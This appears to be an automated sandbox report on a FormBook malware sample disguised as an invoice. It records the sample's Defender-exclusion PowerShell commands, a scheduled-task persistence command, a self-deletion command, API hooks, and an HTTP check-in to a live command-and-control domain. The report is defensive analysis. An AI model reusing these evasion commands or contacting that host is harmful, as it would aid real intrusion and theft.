SSDEEP:	12288:TXgCvpTVNXNTOGxNwf092eFjux/6VLcviorDC77Fd6LxIKC088VT0/gVwCTpaOMR:TXhvpTfdrR2+j7VLOioretkxIXQ0/bOy
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............~.... ........@.. ....................... ............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4bc07e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x608FA418 [Mon May 3 07:19:52 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc02c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbe000	0xeb8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xba084	0xba200	False	0.9400866773	data	7.93397311121	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xbe000	0xeb8	0x1000	False	0.373291015625	data	4.74014351229	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc0000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xbe090	0x38c	PGP symmetric key encrypted data - Plaintext or unencrypted data
RT_MANIFEST	0xbe42c	0xa85	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2018
Assembly Version	1.0.0.0
InternalName	SynchronizedList.exe
FileVersion	1.0.1.35
CompanyName	Unguest
LegalTrademarks	Unguest
Comments	A light media player
ProductName	LightWatch
ProductVersion	1.0.1.35
FileDescription	LightWatch
OriginalFilename	SynchronizedList.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/03/21-14:51:50.228654	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	154.207.58.218
05/03/21-14:51:50.228654	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	154.207.58.218
05/03/21-14:51:50.228654	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49749	80	192.168.2.3	154.207.58.218
05/03/21-14:51:50.836708	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 14:51:49.998538017 CEST	49749	80	192.168.2.3	154.207.58.218
May 3, 2021 14:51:50.227999926 CEST	80	49749	154.207.58.218	192.168.2.3
May 3, 2021 14:51:50.228612900 CEST	49749	80	192.168.2.3	154.207.58.218
May 3, 2021 14:51:50.228653908 CEST	49749	80	192.168.2.3	154.207.58.218
May 3, 2021 14:51:50.456587076 CEST	80	49749	154.207.58.218	192.168.2.3
May 3, 2021 14:51:50.689347029 CEST	80	49749	154.207.58.218	192.168.2.3
May 3, 2021 14:51:50.689378977 CEST	80	49749	154.207.58.218	192.168.2.3
May 3, 2021 14:51:50.690615892 CEST	49749	80	192.168.2.3	154.207.58.218
May 3, 2021 14:51:50.690653086 CEST	49749	80	192.168.2.3	154.207.58.218
May 3, 2021 14:51:50.920502901 CEST	80	49749	154.207.58.218	192.168.2.3

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 3, 2021 14:49:57.317878962 CEST	53	64938	8.8.8.8	192.168.2.3
May 3, 2021 14:49:57.322339058 CEST	60152	53	192.168.2.3	8.8.8.8
May 3, 2021 14:49:57.371908903 CEST	53	60152	8.8.8.8	192.168.2.3
May 3, 2021 14:49:57.418917894 CEST	57544	53	192.168.2.3	8.8.8.8
May 3, 2021 14:49:57.478156090 CEST	53	57544	8.8.8.8	192.168.2.3
May 3, 2021 14:49:58.054728985 CEST	55984	53	192.168.2.3	8.8.8.8
May 3, 2021 14:49:58.103370905 CEST	53	55984	8.8.8.8	192.168.2.3
May 3, 2021 14:49:59.108160019 CEST	64185	53	192.168.2.3	8.8.8.8
May 3, 2021 14:49:59.159979105 CEST	53	64185	8.8.8.8	192.168.2.3
May 3, 2021 14:49:59.791127920 CEST	65110	53	192.168.2.3	8.8.8.8
May 3, 2021 14:49:59.852382898 CEST	53	65110	8.8.8.8	192.168.2.3
May 3, 2021 14:50:00.310664892 CEST	58361	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:00.359349966 CEST	53	58361	8.8.8.8	192.168.2.3
May 3, 2021 14:50:01.099222898 CEST	63492	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:01.147954941 CEST	53	63492	8.8.8.8	192.168.2.3
May 3, 2021 14:50:02.584081888 CEST	60831	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:02.637315035 CEST	53	60831	8.8.8.8	192.168.2.3
May 3, 2021 14:50:03.558026075 CEST	60100	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:03.610703945 CEST	53	60100	8.8.8.8	192.168.2.3
May 3, 2021 14:50:04.429945946 CEST	53195	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:04.478590012 CEST	53	53195	8.8.8.8	192.168.2.3
May 3, 2021 14:50:05.554126978 CEST	50141	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:05.606720924 CEST	53	50141	8.8.8.8	192.168.2.3
May 3, 2021 14:50:06.626275063 CEST	53023	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:06.674918890 CEST	53	53023	8.8.8.8	192.168.2.3
May 3, 2021 14:50:07.739587069 CEST	49563	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:07.791148901 CEST	53	49563	8.8.8.8	192.168.2.3
May 3, 2021 14:50:09.092293978 CEST	51352	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:09.143754959 CEST	53	51352	8.8.8.8	192.168.2.3
May 3, 2021 14:50:10.360970020 CEST	59349	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:10.410541058 CEST	53	59349	8.8.8.8	192.168.2.3
May 3, 2021 14:50:11.605586052 CEST	57084	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:11.654170036 CEST	53	57084	8.8.8.8	192.168.2.3
May 3, 2021 14:50:13.135993958 CEST	58823	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:13.193166018 CEST	53	58823	8.8.8.8	192.168.2.3
May 3, 2021 14:50:14.772459030 CEST	57568	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:14.821333885 CEST	53	57568	8.8.8.8	192.168.2.3
May 3, 2021 14:50:15.887100935 CEST	50540	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:15.935822010 CEST	53	50540	8.8.8.8	192.168.2.3
May 3, 2021 14:50:17.012751102 CEST	54366	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:17.061724901 CEST	53	54366	8.8.8.8	192.168.2.3
May 3, 2021 14:50:35.768117905 CEST	53034	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:35.853097916 CEST	53	53034	8.8.8.8	192.168.2.3
May 3, 2021 14:50:41.068684101 CEST	57762	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:41.120315075 CEST	53	57762	8.8.8.8	192.168.2.3
May 3, 2021 14:50:53.544783115 CEST	55435	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:53.602178097 CEST	53	55435	8.8.8.8	192.168.2.3
May 3, 2021 14:50:53.629376888 CEST	50713	53	192.168.2.3	8.8.8.8
May 3, 2021 14:50:53.686345100 CEST	53	50713	8.8.8.8	192.168.2.3
May 3, 2021 14:51:09.428570032 CEST	56132	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:09.489972115 CEST	53	56132	8.8.8.8	192.168.2.3
May 3, 2021 14:51:33.954490900 CEST	58987	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:34.012392998 CEST	53	58987	8.8.8.8	192.168.2.3
May 3, 2021 14:51:34.030267000 CEST	56579	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:34.155283928 CEST	53	56579	8.8.8.8	192.168.2.3
May 3, 2021 14:51:35.160784006 CEST	60633	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:35.300602913 CEST	53	60633	8.8.8.8	192.168.2.3
May 3, 2021 14:51:36.161204100 CEST	61292	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:36.213290930 CEST	53	61292	8.8.8.8	192.168.2.3
May 3, 2021 14:51:36.766047955 CEST	63619	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:37.050554991 CEST	53	63619	8.8.8.8	192.168.2.3
May 3, 2021 14:51:37.939562082 CEST	64938	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:38.086294889 CEST	53	64938	8.8.8.8	192.168.2.3
May 3, 2021 14:51:38.996150970 CEST	61946	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:39.053833008 CEST	53	61946	8.8.8.8	192.168.2.3
May 3, 2021 14:51:39.647979021 CEST	64910	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:39.696749926 CEST	53	64910	8.8.8.8	192.168.2.3
May 3, 2021 14:51:41.230832100 CEST	52123	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:41.289402962 CEST	53	52123	8.8.8.8	192.168.2.3
May 3, 2021 14:51:42.211827040 CEST	56130	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:42.274375916 CEST	53	56130	8.8.8.8	192.168.2.3
May 3, 2021 14:51:42.839030027 CEST	56338	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:42.896060944 CEST	53	56338	8.8.8.8	192.168.2.3
May 3, 2021 14:51:48.780131102 CEST	59420	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:49.772160053 CEST	59420	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:49.988893986 CEST	53	59420	8.8.8.8	192.168.2.3
May 3, 2021 14:51:50.836478949 CEST	53	59420	8.8.8.8	192.168.2.3
May 3, 2021 14:51:54.264553070 CEST	58784	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:54.316430092 CEST	53	58784	8.8.8.8	192.168.2.3
May 3, 2021 14:51:58.754213095 CEST	63978	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:58.813070059 CEST	53	63978	8.8.8.8	192.168.2.3
May 3, 2021 14:51:59.031641006 CEST	62938	53	192.168.2.3	8.8.8.8
May 3, 2021 14:51:59.100789070 CEST	53	62938	8.8.8.8	192.168.2.3
May 3, 2021 14:52:08.897413969 CEST	55708	53	192.168.2.3	8.8.8.8
May 3, 2021 14:52:09.883294106 CEST	53	55708	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 3, 2021 14:51:50.836708069 CEST	192.168.2.3	8.8.8.8	d002	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
May 3, 2021 14:51:48.780131102 CEST	192.168.2.3	8.8.8.8	0xb941	Standard query (0)	www.tabuk24.com	A (IP address)	IN (0x0001)
May 3, 2021 14:51:49.772160053 CEST	192.168.2.3	8.8.8.8	0xb941	Standard query (0)	www.tabuk24.com	A (IP address)	IN (0x0001)
May 3, 2021 14:52:08.897413969 CEST	192.168.2.3	8.8.8.8	0xd1e7	Standard query (0)	www.swim-maki.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
May 3, 2021 14:51:49.988893986 CEST	8.8.8.8	192.168.2.3	0xb941	No error (0)	www.tabuk24.com		154.207.58.218	A (IP address)	IN (0x0001)
May 3, 2021 14:51:50.836478949 CEST	8.8.8.8	192.168.2.3	0xb941	No error (0)	www.tabuk24.com		154.207.58.218	A (IP address)	IN (0x0001)
May 3, 2021 14:52:09.883294106 CEST	8.8.8.8	192.168.2.3	0xd1e7	Server failure (2)	www.swim-maki.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.tabuk24.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49749	154.207.58.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
May 3, 2021 14:51:50.228653908 CEST	2316	OUT	GET /csi/?TTgLKx=uFNDtp4H1nDLCVd&mR-ptRI=N6ynhade2rGTzfH7Obdga9j8h7xnVmduHv/FNLw2V1/oBiufSguui3vD99XwSD3G2mHh HTTP/1.1 Host: www.tabuk24.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
May 3, 2021 14:51:50.689347029 CEST	2317	IN	HTTP/1.1 302 Moved Temporarily Date: Mon, 03 May 2021 12:51:50 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=0ccp7pnis5pqjp9tntf07ueci5; path=/ Set-Cookie: ray_leech_token=1620046311; path=/ Upgrade: h2 Connection: Upgrade, close Location: / Content-Length: 0 Content-Type: text/html; charset=gbk

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEF
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEF
GetMessageW	INLINE	0x48 0x8B 0xB8 0x86 0x6E 0xEF
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8E 0xEE 0xEF

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Invoiceo.exe PID: 6316 Parent PID: 5620

General

Start time:	14:50:04
Start date:	03/05/2021
Path:	C:\Users\user\Desktop\Invoiceo.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Invoiceo.exe'
Imagebase:	0x310000
File size:	767488 bytes
MD5 hash:	8F2489D7CE50E99109AF9925818DAF2B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.220474872.0000000003749000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: powershell.exe PID: 6584 Parent PID: 6316

General

Start time:	14:50:08
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Invoiceo.exe'
Imagebase:	0x1150000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6596 Parent PID: 6584

General

Start time:	14:50:08
Start date:	03/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6660 Parent PID: 6316

General

Start time:	14:50:09
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'
Imagebase:	0x1150000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6708 Parent PID: 6660

General

Start time:	14:50:09
Start date:	03/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 6716 Parent PID: 6316

General

Start time:	14:50:09
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\yYxmxiApi' /XML 'C:\Users\user\AppData\Local\Temp\tmpEE1D.tmp'
Imagebase:	0x1130000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6732 Parent PID: 6716

General

Start time:	14:50:10
Start date:	03/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 6856 Parent PID: 6316

General

Start time:	14:50:10
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\yYxmxiApi.exe'
Imagebase:	0x1150000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: Invoiceo.exe PID: 6872 Parent PID: 6316

General

Start time:	14:50:11
Start date:	03/05/2021
Path:	C:\Users\user\Desktop\Invoiceo.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Invoiceo.exe
Imagebase:	0x5e0000
File size:	767488 bytes
MD5 hash:	8F2489D7CE50E99109AF9925818DAF2B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.324137848.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.329186274.0000000000C40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 6880 Parent PID: 6856

General

Start time:	14:50:11
Start date:	03/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 6872

General

Start time:	14:50:14
Start date:	03/05/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 5112 Parent PID: 3388

General

Start time:	14:50:58
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x330000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 0000001A.00000002.469448045.0000000000400000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001A.00000002.476129383.0000000003200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4604 Parent PID: 5112

General

Start time:	14:51:04
Start date:	03/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Invoiceo.exe'
Imagebase:	0x330000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2152 Parent PID: 4604

General

Start time:	14:51:05
Start date:	03/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Invoiceo.exe PID: 6316 Parent PID: 5620 Invoiceo.exeCOMMON

Executed Functions

Function 025F94A8, Relevance: .7, Instructions: 658COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f5b0a617438e0f65c27fdb9f04abf56ea2f528ea8a9078e21ef90098734bd44
Instruction ID: e33045d869ed466c3c26687c2ac7ad6608578e70a16a7f35cac4d53885db912a
Opcode Fuzzy Hash: 4f5b0a617438e0f65c27fdb9f04abf56ea2f528ea8a9078e21ef90098734bd44
Instruction Fuzzy Hash: 7F526A31A00A198FDB54DF64C880BAEB7B2FF85304F1588A9EA15AB251D770FD85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 025F6A40, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 025F6AB0
GetCurrentThread.KERNEL32 ref: 025F6AED
GetCurrentProcess.KERNEL32 ref: 025F6B2A
GetCurrentThreadId.KERNEL32 ref: 025F6B83

Memory Dump Source

Source File: 00000000.00000002.216924669.00000000025F0000.00000040.00000001.sdmp, Offset: 025F0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 954a82846a8d35bef9c55bf53cf1b2715b808bda042dbde89202b7f5157de7b3
Instruction ID: 0bed65183ead370bb4adf7d9b260ef60ee8ca64ee76a0f23ace2ad290d96ced3
Opcode Fuzzy Hash: 954a82846a8d35bef9c55bf53cf1b2715b808bda042dbde89202b7f5157de7b3
Instruction Fuzzy Hash: EB5167B09006498FDB14CFA9DA48BDEBBF4FF48314F248499E119A7390E7359844CF65

Uniqueness

Uniqueness Score: -1.00%

Function 025F6A50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

